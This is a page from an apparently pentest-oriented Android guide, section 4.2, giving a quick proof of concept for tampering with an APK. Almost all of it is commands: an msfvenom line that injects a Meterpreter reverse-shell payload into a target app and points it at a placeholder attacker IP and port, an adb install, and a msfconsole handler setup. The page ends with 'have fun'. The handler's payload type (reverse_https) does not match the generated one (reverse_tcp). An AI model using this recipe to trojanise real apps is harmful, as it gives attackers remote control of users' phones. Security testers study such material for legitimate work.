[A]ndroid [A]pplication [P]entest [G]uide
  • AAPG
  • 1. MANUAL STATIC ANALYSIS
    • 1.1 Decompile APK
    • 1.2 Check certificate
    • 1.3 Analyze AndroidManifest.xml
    • 1.4 Source Code Analysis
  • 2. AUTOMATED STATIC ANALYSIS
  • 3. MANUAL DYNAMIC ANALYSIS
    • 3.1 Install application & use it
    • 3.2 Bypass detections
    • 3.3 Analyze local storage
    • 3.4 Attack surface
      • 3.4.1 Activities
      • 3.4.2 ContentProvider
      • 3.4.3 Services
    • 3.5 Log analysis
    • 3.6 More HOW and WHAT! (still work in progress)
  • 4. APK TAMPERING
    • 4.1 DIY - Simple Reverse Meterpreter (Non-Xamarin)
    • 4.2 Quick Proof-of-Concept (Meterpreter)
Powered by GitBook
On this page
  • Create backdoored apk
  • Install application
  • Start meterpreter session handler
  • START APPLICATION ON DEVICE AND HAVE FUN!!! ;)

Was this helpful?

  1. 4. APK TAMPERING

4.2 Quick Proof-of-Concept (Meterpreter)

Previous4.1 DIY - Simple Reverse Meterpreter (Non-Xamarin)

Last updated 5 years ago

Was this helpful?

This revealed to me a functionality which I was not aware of - msfvenom does everything for you!

Works as well for Xamarin-Apps.

Create backdoored apk

msfvenom -x /path/to/target_app.apk -p android/meterpreter/reverse_tcp LHOSt=<ATTACKER-IP> LPORT=<ATTACKER-PORT> -o target_modified.apk

Output: Saved as: target_modified.apk

Install application

adb install target_modified.apk

Start meterpreter session handler

(use same IP & port as you used to generate the payload above):

msfconsole
use multi/handler
set payload android/meterpreter/reverse_https
set LHOST <ATTACKER-IP>
set LPORT <ATTACKER-PORT>
run

START APPLICATION ON DEVICE AND HAVE FUN!!! ;)

guide